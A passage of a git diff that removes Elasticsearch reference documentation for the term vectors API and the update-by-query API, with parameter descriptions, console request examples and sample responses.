statistics_ -and _field statistics_. By default, all term information and field -statistics are returned for all fields but term statistics are excluded. - -[[docs-termvectors-api-term-info]] -===== Term information - - * term frequency in the field (always returned) - * term positions (`positions` : true) - * start and end offsets (`offsets` : true) - * term payloads (`payloads` : true), as base64 encoded bytes - -If the requested information wasn't stored in the index, it will be -computed on the fly if possible. Additionally, term vectors could be computed -for documents not even existing in the index, but instead provided by the user. - -[WARNING] -====== -Start and end offsets assume UTF-16 encoding is being used. If you want to use -these offsets in order to get the original text that produced this token, you -should make sure that the string you are taking a sub-string of is also encoded -using UTF-16. -====== - -[[docs-termvectors-api-term-stats]] -===== Term statistics - -Setting `term_statistics` to `true` (default is `false`) will -return - - * total term frequency (how often a term occurs in all documents) + - * document frequency (the number of documents containing the current - term) - -By default these values are not returned since term statistics can -have a serious performance impact. 
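-
-If you do need them, you can request term statistics explicitly. The following
-sketch asks for term statistics on a single field of document `1`; it assumes
-the `my-index-000001` index used elsewhere on this page and is illustrative
-only:
-
-[source,console]
---------------------------------------------------
-GET /my-index-000001/_termvectors/1?fields=message&term_statistics=true
---------------------------------------------------
-// TEST[skip:illustrative sketch]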
- -[[docs-termvectors-api-field-stats]] -===== Field statistics - -Setting `field_statistics` to `false` (default is `true`) will -omit : - - * document count (how many documents contain this field) - * sum of document frequencies (the sum of document frequencies for all - terms in this field) - * sum of total term frequencies (the sum of total term frequencies of - each term in this field) - -[[docs-termvectors-api-terms-filtering]] -===== Terms filtering - -With the parameter `filter`, the terms returned could also be filtered based -on their tf-idf scores. This could be useful in order find out a good -characteristic vector of a document. This feature works in a similar manner to -the <> of the -<>. See <> -for usage. - -The following sub-parameters are supported: - -[horizontal] -`max_num_terms`:: - Maximum number of terms that must be returned per field. Defaults to `25`. -`min_term_freq`:: - Ignore words with less than this frequency in the source doc. Defaults to `1`. -`max_term_freq`:: - Ignore words with more than this frequency in the source doc. Defaults to unbounded. -`min_doc_freq`:: - Ignore terms which do not occur in at least this many docs. Defaults to `1`. -`max_doc_freq`:: - Ignore words which occur in more than this many docs. Defaults to unbounded. -`min_word_length`:: - The minimum word length below which words will be ignored. Defaults to `0`. -`max_word_length`:: - The maximum word length above which words will be ignored. Defaults to unbounded (`0`). - -[[docs-termvectors-api-behavior]] -==== Behaviour - -The term and field statistics are not accurate. Deleted documents -are not taken into account. The information is only retrieved for the -shard the requested document resides in. -The term and field statistics are therefore only useful as relative measures -whereas the absolute numbers have no meaning in this context. By default, -when requesting term vectors of artificial documents, a shard to get the statistics -from is randomly selected. Use `routing` only to hit a particular shard. - -[[docs-termvectors-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the index that contains the document. - -`<_id>`:: -(Optional, string) Unique identifier of the document. - -[[docs-termvectors-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=field_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=offsets] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=payloads] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=positions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=term_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[[docs-termvectors-api-example]] -==== {api-examples-title} - -[[docs-termvectors-api-stored-termvectors]] -===== Returning stored term vectors - -First, we create an index that stores term vectors, payloads etc. 
: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_offsets_payloads", - "store" : true, - "analyzer" : "fulltext_analyzer" - }, - "fullname": { - "type": "text", - "term_vector": "with_positions_offsets_payloads", - "analyzer" : "fulltext_analyzer" - } - } - }, - "settings" : { - "index" : { - "number_of_shards" : 1, - "number_of_replicas" : 0 - }, - "analysis": { - "analyzer": { - "fulltext_analyzer": { - "type": "custom", - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "type_as_payload" - ] - } - } - } - } -} --------------------------------------------------- - -Second, we add some documents: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1 -{ - "fullname" : "John Doe", - "text" : "test test test " -} - -PUT /my-index-000001/_doc/2?refresh=wait_for -{ - "fullname" : "Jane Doe", - "text" : "Another test ..." -} --------------------------------------------------- -// TEST[continued] - -The following request returns all information and statistics for field -`text` in document `1` (John Doe): - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 -{ - "fields" : ["text"], - "offsets" : true, - "payloads" : true, - "positions" : true, - "term_statistics" : true, - "field_statistics" : true -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "found": true, - "took": 6, - "term_vectors": { - "text": { - "field_statistics": { - "sum_doc_freq": 4, - "doc_count": 2, - "sum_ttf": 6 - }, - "terms": { - "test": { - "doc_freq": 2, - "ttf": 4, - "term_freq": 3, - "tokens": [ - { - "position": 0, - "start_offset": 0, - "end_offset": 4, - "payload": "d29yZA==" - }, - { - "position": 1, - "start_offset": 5, - "end_offset": 9, - "payload": "d29yZA==" - }, - { - "position": 2, - "start_offset": 10, - "end_offset": 14, - "payload": "d29yZA==" - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"took": 6/"took": "$body.took"/] - -[[docs-termvectors-api-generate-termvectors]] -===== Generating term vectors on the fly - -Term vectors which are not explicitly stored in the index are automatically -computed on the fly. The following request returns all information and statistics for the -fields in document `1`, even though the terms haven't been explicitly stored in the index. -Note that for the field `text`, the terms are not re-generated. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors/1 -{ - "fields" : ["text", "some_field_without_term_vectors"], - "offsets" : true, - "positions" : true, - "term_statistics" : true, - "field_statistics" : true -} --------------------------------------------------- -// TEST[continued] - -[[docs-termvectors-artificial-doc]] -===== Artificial documents - -Term vectors can also be generated for artificial documents, -that is for documents not present in the index. For example, the following request would -return the same results as in example 1. The mapping used is determined by the `index`. 
- -*If dynamic mapping is turned on (default), the document fields not in the original -mapping will be dynamically created.* - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors -{ - "doc" : { - "fullname" : "John Doe", - "text" : "test test test" - } -} --------------------------------------------------- -// TEST[continued] - -[[docs-termvectors-per-field-analyzer]] -====== Per-field analyzer - -Additionally, a different analyzer than the one at the field may be provided -by using the `per_field_analyzer` parameter. This is useful in order to -generate term vectors in any fashion, especially when using artificial -documents. When providing an analyzer for a field that already stores term -vectors, the term vectors will be re-generated. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_termvectors -{ - "doc" : { - "fullname" : "John Doe", - "text" : "test test test" - }, - "fields": ["fullname"], - "per_field_analyzer" : { - "fullname": "keyword" - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_version": 0, - "found": true, - "took": 6, - "term_vectors": { - "fullname": { - "field_statistics": { - "sum_doc_freq": 2, - "doc_count": 4, - "sum_ttf": 4 - }, - "terms": { - "John Doe": { - "term_freq": 1, - "tokens": [ - { - "position": 0, - "start_offset": 0, - "end_offset": 8 - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] -// TESTRESPONSE[s/"took": 6/"took": "$body.took"/] -// TESTRESPONSE[s/"sum_doc_freq": 2/"sum_doc_freq": "$body.term_vectors.fullname.field_statistics.sum_doc_freq"/] -// TESTRESPONSE[s/"doc_count": 4/"doc_count": "$body.term_vectors.fullname.field_statistics.doc_count"/] -// TESTRESPONSE[s/"sum_ttf": 4/"sum_ttf": "$body.term_vectors.fullname.field_statistics.sum_ttf"/] - - -[[docs-termvectors-terms-filtering]] -===== Terms filtering - -Finally, the terms returned could be filtered based on their tf-idf scores. In -the example below we obtain the three most "interesting" keywords from the -artificial document having the given "plot" field value. Notice -that the keyword "Tony" or any stop words are not part of the response, as -their tf-idf must be too low. - -[source,console] --------------------------------------------------- -GET /imdb/_termvectors -{ - "doc": { - "plot": "When wealthy industrialist Tony Stark is forced to build an armored suit after a life-threatening incident, he ultimately decides to use its technology to fight against evil." 
- }, - "term_statistics": true, - "field_statistics": true, - "positions": false, - "offsets": false, - "filter": { - "max_num_terms": 3, - "min_term_freq": 1, - "min_doc_freq": 1 - } -} --------------------------------------------------- -// TEST[skip:no imdb test index] - -Response: - -[source,console-result] --------------------------------------------------- -{ - "_index": "imdb", - "_type": "_doc", - "_version": 0, - "found": true, - "term_vectors": { - "plot": { - "field_statistics": { - "sum_doc_freq": 3384269, - "doc_count": 176214, - "sum_ttf": 3753460 - }, - "terms": { - "armored": { - "doc_freq": 27, - "ttf": 27, - "term_freq": 1, - "score": 9.74725 - }, - "industrialist": { - "doc_freq": 88, - "ttf": 88, - "term_freq": 1, - "score": 8.590818 - }, - "stark": { - "doc_freq": 44, - "ttf": 47, - "term_freq": 1, - "score": 9.272792 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/docs/update-by-query.asciidoc b/docs/reference/docs/update-by-query.asciidoc deleted file mode 100644 index 72e52071b9a..00000000000 --- a/docs/reference/docs/update-by-query.asciidoc +++ /dev/null @@ -1,794 +0,0 @@ -[[docs-update-by-query]] -=== Update By Query API -++++ -Update by query -++++ - -Updates documents that match the specified query. -If no query is specified, performs an update on every document in the data stream or index without -modifying the source, which is useful for picking up mapping changes. - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?conflicts=proceed --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "updated": 120, - "deleted": 0, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 120, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] - -//// - -[[docs-update-by-query-api-request]] -==== {api-request-title} - -`POST //_update_by_query` - -[[docs-update-by-query-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** `read` -** `index` or `write` - -[[docs-update-by-query-api-desc]] -==== {api-description-title} - -You can specify the query criteria in the request URI or the request body -using the same syntax as the <>. - -When you submit an update by query request, {es} gets a snapshot of the data stream or index -when it begins processing the request and updates matching documents using -`internal` versioning. -When the versions match, the document is updated and the version number is incremented. -If a document changes between the time that the snapshot is taken and -the update operation is processed, it results in a version conflict and the operation fails. -You can opt to count version conflicts instead of halting and returning by -setting `conflicts` to `proceed`. - -NOTE: Documents with a version equal to 0 cannot be updated using update by -query because `internal` versioning does not support 0 as a valid -version number. 
- -While processing an update by query request, {es} performs multiple search -requests sequentially to find all of the matching documents. -A bulk update request is performed for each batch of matching documents. -Any query or update failures cause the update by query request to fail and -the failures are shown in the response. -Any update requests that completed successfully still stick, they are not rolled back. - -===== Refreshing shards - -Specifying the `refresh` parameter refreshes all shards once the request completes. -This is different than the update API's `refresh` parameter, which causes just the shard -that received the request to be refreshed. Unlike the update API, it does not support -`wait_for`. - -[[docs-update-by-query-task-api]] -===== Running update by query asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. -{es} creates a record of this task as a document at `.tasks/task/${taskId}`. -When you are done with a task, you should delete the task document so -{es} can reclaim the space. - -===== Waiting for active shards - -`wait_for_active_shards` controls how many copies of a shard must be active -before proceeding with the request. See <> -for details. `timeout` controls how long each write request waits for unavailable -shards to become available. Both work exactly the way they work in the -<>. Update by query uses scrolled searches, so you can also -specify the `scroll` parameter to control how long it keeps the search context -alive, for example `?scroll=10m`. The default is 5 minutes. - -===== Throttling update requests - -To control the rate at which update by query issues batches of update operations, -you can set `requests_per_second` to any positive decimal number. This pads each -batch with a wait time to throttle the rate. Set `requests_per_second` to `-1` -to disable throttling. - -Throttling uses a wait time between batches so that the internal scroll requests -can be given a timeout that takes the request padding into account. The padding -time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds --------------------------------------------------- - -Since the batch is issued as a single `_bulk` request, large batch sizes -cause {es} to create many requests and wait before starting the next set. -This is "bursty" instead of "smooth". - -[[docs-update-by-query-slice]] -===== Slicing - -Update by query supports <> to parallelize the -update process. This can improve efficiency and provide a -convenient way to break the request down into smaller parts. - -Setting `slices` to `auto` chooses a reasonable number for most data streams and indices. -If you're slicing manually or otherwise tuning automatic slicing, keep in mind -that: - -* Query performance is most efficient when the number of `slices` is equal to -the number of shards in the index or backing index. If that number is large (for example, -500), choose a lower number as too many `slices` hurts performance. Setting -`slices` higher than the number of shards generally does not improve efficiency -and adds overhead. 
- -* Update performance scales linearly across available resources with the -number of slices. - -Whether query or update performance dominates the runtime depends on the -documents being reindexed and cluster resources. - -[[docs-update-by-query-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases to search. -Wildcard (`*`) expressions are supported. -+ -To search all data streams or indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[docs-update-by-query-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyzer] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=analyze_wildcard] - -`conflicts`:: - (Optional, string) What to do if update by query hits version conflicts: - `abort` or `proceed`. Defaults to `abort`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=default_operator] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=df] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=from] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=lenient] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=max_docs] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search-q] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=request_cache] - -`refresh`:: -(Optional, Boolean) -If `true`, {es} refreshes affected shards to make the operation visible to -search. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=requests_per_second] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll_size] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`search_timeout`:: -(Optional, <>) -Explicit timeout for each search request. -Defaults to no timeout. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=slices] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=sort] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stats] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=terminate_after] - -`timeout`:: -+ --- -(Optional, <>) -Period each update request waits for the following operations: - -* Dynamic mapping updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. 
--- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -[[docs-update-by-query-api-request-body]] -==== {api-request-body-title} - -`query`:: - (Optional, <>) Specifies the documents to update - using the <>. - - -[[docs-update-by-query-api-response-body]] -==== Response body - -`took`:: -The number of milliseconds from start to end of the whole operation. - -`timed_out`:: -This flag is set to `true` if any of the requests executed during the -update by query execution has timed out. - -`total`:: -The number of documents that were successfully processed. - -`updated`:: -The number of documents that were successfully updated. - -`deleted`:: -The number of documents that were successfully deleted. - -`batches`:: -The number of scroll responses pulled back by the update by query. - -`version_conflicts`:: -The number of version conflicts that the update by query hit. - -`noops`:: -The number of documents that were ignored because the script used for -the update by query returned a `noop` value for `ctx.op`. - -`retries`:: -The number of retries attempted by update by query. `bulk` is the number of bulk -actions retried, and `search` is the number of search actions retried. - -`throttled_millis`:: -Number of milliseconds the request slept to conform to `requests_per_second`. - -`requests_per_second`:: -The number of requests per second effectively executed during the update by query. - -`throttled_until_millis`:: -This field should always be equal to zero in an `_update_by_query` response. It only -has meaning when using the <>, where it -indicates the next time (in milliseconds since epoch) a throttled request will be -executed again in order to conform to `requests_per_second`. - -`failures`:: -Array of failures if there were any unrecoverable errors during the process. If -this is non-empty then the request aborted because of those failures. -Update by query is implemented using batches. Any failure causes the entire -process to abort, but all failures in the current batch are collected into the -array. You can use the `conflicts` option to prevent reindex from aborting on -version conflicts. - -[[docs-update-by-query-api-example]] -==== {api-examples-title} - -The simplest usage of `_update_by_query` just performs an update on every -document in the data stream or index without changing the source. This is useful to -<> or some other online -mapping change. - -To update selected documents, specify a query in the request body: - -[source,console] --------------------------------------------------- -POST my-index-000001/_update_by_query?conflicts=proceed -{ - "query": { <1> - "term": { - "user.id": "kimchy" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> The query must be passed as a value to the `query` key, in the same -way as the <>. You can also use the `q` -parameter in the same way as the search API. 
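-
-The same selection can also be expressed with the `q` query string parameter.
-The following sketch is intended to be equivalent to the request above and
-assumes the same `my-index-000001` index:
-
-[source,console]
---------------------------------------------------
-POST my-index-000001/_update_by_query?q=user.id:kimchy&conflicts=proceed
---------------------------------------------------
-// TEST[skip:illustrative sketch]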
-
-Update documents in multiple data streams or indices:
-
-[source,console]
---------------------------------------------------
-POST my-index-000001,my-index-000002/_update_by_query
---------------------------------------------------
-// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/]
-
-Limit the update by query operation to shards that match a particular routing value:
-
-[source,console]
---------------------------------------------------
-POST my-index-000001/_update_by_query?routing=1
---------------------------------------------------
-// TEST[setup:my_index]
-
-By default, update by query uses scroll batches of 1000.
-You can change the batch size with the `scroll_size` parameter:
-
-[source,console]
---------------------------------------------------
-POST my-index-000001/_update_by_query?scroll_size=100
---------------------------------------------------
-// TEST[setup:my_index]
-
-[[docs-update-by-query-api-source]]
-===== Update the document source
-
-Update by query supports scripts to update the document source.
-For example, the following request increments the `count` field for all
-documents with a `user.id` of `kimchy` in `my-index-000001`:
-
-////
-[source,console]
-----
-PUT my-index-000001/_create/1
-{
-  "user": {
-    "id": "kimchy"
-  },
-  "count": 1
-}
-----
-////
-
-[source,console]
---------------------------------------------------
-POST my-index-000001/_update_by_query
-{
-  "script": {
-    "source": "ctx._source.count++",
-    "lang": "painless"
-  },
-  "query": {
-    "term": {
-      "user.id": "kimchy"
-    }
-  }
-}
---------------------------------------------------
-// TEST[continued]
-
-Note that `conflicts=proceed` is not specified in this example. In this case, a
-version conflict should halt the process so you can handle the failure.
-
-As with the <>, you can set `ctx.op` to change the
-operation that is performed:
-
-[horizontal]
-`noop`::
-Set `ctx.op = "noop"` if your script decides that it doesn't have to make any changes.
-The update by query operation skips updating the document and increments the `noop` counter.
-
-`delete`::
-Set `ctx.op = "delete"` if your script decides that the document should be deleted.
-The update by query operation deletes the document and increments the `deleted` counter.
-
-Update by query only supports `update`, `noop`, and `delete`.
-Setting `ctx.op` to anything else is an error. Setting any other field in `ctx` is an error.
-This API only enables you to modify the source of matching documents; you cannot move them.
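-
-Putting this together, a script can decide per document whether to update,
-delete, or skip. The following sketch deletes matching documents whose
-hypothetical `status` field is `stale` and leaves everything else untouched;
-the field name and value are made up for illustration:
-
-[source,console]
---------------------------------------------------
-POST my-index-000001/_update_by_query
-{
-  "script": {
-    "lang": "painless",
-    "source": "if (ctx._source.status == 'stale') { ctx.op = 'delete' } else { ctx.op = 'noop' }"
-  },
-  "query": {
-    "term": {
-      "user.id": "kimchy"
-    }
-  }
-}
---------------------------------------------------
-// TEST[skip:illustrative sketch]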
- -[[docs-update-by-query-api-ingest-pipeline]] -===== Update documents using an ingest pipeline - -Update by query can use the <> feature by specifying a `pipeline`: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/set-foo -{ - "description" : "sets foo", - "processors" : [ { - "set" : { - "field": "foo", - "value": "bar" - } - } ] -} -POST my-index-000001/_update_by_query?pipeline=set-foo --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[docs-update-by-query-fetch-tasks]] -===== Get the status of update by query operations - -You can fetch the status of all running update by query requests with the -<>: - -[source,console] --------------------------------------------------- -GET _tasks?detailed=true&actions=*byquery --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The responses looks like: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "r1A2WoRbTwKZ516z6NEs5A" : { - "name" : "r1A2WoR", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "attributes" : { - "testattr" : "test", - "portsfile" : "true" - }, - "tasks" : { - "r1A2WoRbTwKZ516z6NEs5A:36619" : { - "node" : "r1A2WoRbTwKZ516z6NEs5A", - "id" : 36619, - "type" : "transport", - "action" : "indices:data/write/update/byquery", - "status" : { <1> - "total" : 6154, - "updated" : 3500, - "created" : 0, - "deleted" : 0, - "batches" : 4, - "version_conflicts" : 0, - "noops" : 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0 - }, - "description" : "" - } - } - } - } -} --------------------------------------------------- - -<1> This object contains the actual status. It is just like the response JSON -with the important addition of the `total` field. `total` is the total number -of operations that the reindex expects to perform. You can estimate the -progress by adding the `updated`, `created`, and `deleted` fields. The request -will finish when their sum is equal to the `total` field. - -With the task id you can look up the task directly. The following example -retrieves information about task `r1A2WoRbTwKZ516z6NEs5A:36619`: - -[source,console] --------------------------------------------------- -GET /_tasks/r1A2WoRbTwKZ516z6NEs5A:36619 --------------------------------------------------- -// TEST[catch:missing] - -The advantage of this API is that it integrates with `wait_for_completion=false` -to transparently return the status of completed tasks. If the task is completed -and `wait_for_completion=false` was set on it, then it'll come back with a -`results` or an `error` field. The cost of this feature is the document that -`wait_for_completion=false` creates at `.tasks/task/${taskId}`. It is up to -you to delete that document. - - -[discrete] -[[docs-update-by-query-cancel-task-api]] -===== Cancel an update by query operation - -Any update by query can be cancelled using the <>: - -[source,console] --------------------------------------------------- -POST _tasks/r1A2WoRbTwKZ516z6NEs5A:36619/_cancel --------------------------------------------------- - -The task ID can be found using the <>. - -Cancellation should happen quickly but might take a few seconds. The task status -API above will continue to list the update by query task until this task checks -that it has been cancelled and terminates itself. 
- - -[discrete] -[[docs-update-by-query-rethrottle]] -===== Change throttling for a request - -The value of `requests_per_second` can be changed on a running update by query -using the `_rethrottle` API: - -[source,console] --------------------------------------------------- -POST _update_by_query/r1A2WoRbTwKZ516z6NEs5A:36619/_rethrottle?requests_per_second=-1 --------------------------------------------------- - -The task ID can be found using the <>. - -Just like when setting it on the `_update_by_query` API, `requests_per_second` -can be either `-1` to disable throttling or any decimal number -like `1.7` or `12` to throttle to that level. Rethrottling that speeds up the -query takes effect immediately, but rethrotting that slows down the query will -take effect after completing the current batch. This prevents scroll -timeouts. - -[discrete] -[[docs-update-by-query-manual-slice]] -===== Slice manually -Slice an update by query manually by providing a slice id and total number of -slices to each request: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_update_by_query -{ - "slice": { - "id": 0, - "max": 2 - }, - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} -POST my-index-000001/_update_by_query -{ - "slice": { - "id": 1, - "max": 2 - }, - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you can verify works with: - -[source,console] ----------------------------------------------------------------- -GET _refresh -POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total": { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[docs-update-by-query-automatic-slice]] -===== Use automatic slicing - -You can also let update by query automatically parallelize using -<> to slice on `_id`. Use `slices` to specify the number of -slices to use: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_update_by_query?refresh&slices=5 -{ - "script": { - "source": "ctx._source['extra'] = 'test'" - } -} ----------------------------------------------------------------- -// TEST[setup:my_index_big] - -Which you also can verify works with: - -[source,console] ----------------------------------------------------------------- -POST my-index-000001/_search?size=0&q=extra:test&filter_path=hits.total ----------------------------------------------------------------- -// TEST[continued] - -Which results in a sensible `total` like this one: - -[source,console-result] ----------------------------------------------------------------- -{ - "hits": { - "total": { - "value": 120, - "relation": "eq" - } - } -} ----------------------------------------------------------------- - -Setting `slices` to `auto` will let Elasticsearch choose the number of slices -to use. This setting will use one slice per shard, up to a certain limit. If -there are multiple source data streams or indices, it will choose the number of slices based -on the index or backing index with the smallest number of shards. 
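For example, the earlier request can be rewritten to let Elasticsearch pick the slice count. This is a sketch that mirrors the `slices=5` snippet above rather than an additional tested example:

[source,console]
----
POST my-index-000001/_update_by_query?refresh&slices=auto
{
  "script": {
    "source": "ctx._source['extra'] = 'test'"
  }
}
----
// TEST[skip:illustrative sketch, not part of the tested examples]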
- -Adding `slices` to `_update_by_query` just automates the manual process used in -the section above, creating sub-requests which means it has some quirks: - -* You can see these requests in the -<>. These sub-requests are "child" -tasks of the task for the request with `slices`. -* Fetching the status of the task for the request with `slices` only contains -the status of completed slices. -* These sub-requests are individually addressable for things like cancellation -and rethrottling. -* Rethrottling the request with `slices` will rethrottle the unfinished -sub-request proportionally. -* Canceling the request with `slices` will cancel each sub-request. -* Due to the nature of `slices` each sub-request won't get a perfectly even -portion of the documents. All documents will be addressed, but some slices may -be larger than others. Expect larger slices to have a more even distribution. -* Parameters like `requests_per_second` and `max_docs` on a request with -`slices` are distributed proportionally to each sub-request. Combine that with -the point above about distribution being uneven and you should conclude that -using `max_docs` with `slices` might not result in exactly `max_docs` documents -being updated. -* Each sub-request gets a slightly different snapshot of the source data stream or index -though these are all taken at approximately the same time. - -[discrete] -[[picking-up-a-new-property]] -===== Pick up a new property - -Say you created an index without dynamic mapping, filled it with data, and then -added a mapping value to pick up more fields from the data: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "dynamic": false, <1> - "properties": { - "text": {"type": "text"} - } - } -} - -POST test/_doc?refresh -{ - "text": "words words", - "flag": "bar" -} -POST test/_doc?refresh -{ - "text": "words words", - "flag": "foo" -} -PUT test/_mapping <2> -{ - "properties": { - "text": {"type": "text"}, - "flag": {"type": "text", "analyzer": "keyword"} - } -} --------------------------------------------------- - -<1> This means that new fields won't be indexed, just stored in `_source`. - -<2> This updates the mapping to add the new `flag` field. To pick up the new -field you have to reindex all documents with it. - -Searching for the data won't find anything: - -[source,console] --------------------------------------------------- -POST test/_search?filter_path=hits.total -{ - "query": { - "match": { - "flag": "foo" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "total": { - "value": 0, - "relation": "eq" - } - } -} --------------------------------------------------- - -But you can issue an `_update_by_query` request to pick up the new mapping: - -[source,console] --------------------------------------------------- -POST test/_update_by_query?refresh&conflicts=proceed -POST test/_search?filter_path=hits.total -{ - "query": { - "match": { - "flag": "foo" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "hits" : { - "total": { - "value": 1, - "relation": "eq" - } - } -} --------------------------------------------------- - -You can do the exact same thing when adding a field to a multifield. 
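For instance, a sketch of the multifield case (the `raw` sub-field name is only an illustration and is not part of the tested examples above): add a `keyword` sub-field to the existing `text` field, then run `_update_by_query` so the existing documents are reindexed with it.

[source,console]
----
PUT test/_mapping
{
  "properties": {
    "text": {
      "type": "text",
      "fields": {
        "raw": { "type": "keyword" }
      }
    }
  }
}

POST test/_update_by_query?refresh&conflicts=proceed
----
// TEST[skip:illustrative sketch, not part of the tested examples]

After the `_update_by_query` request finishes, searches against `text.raw` should find the previously indexed documents.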
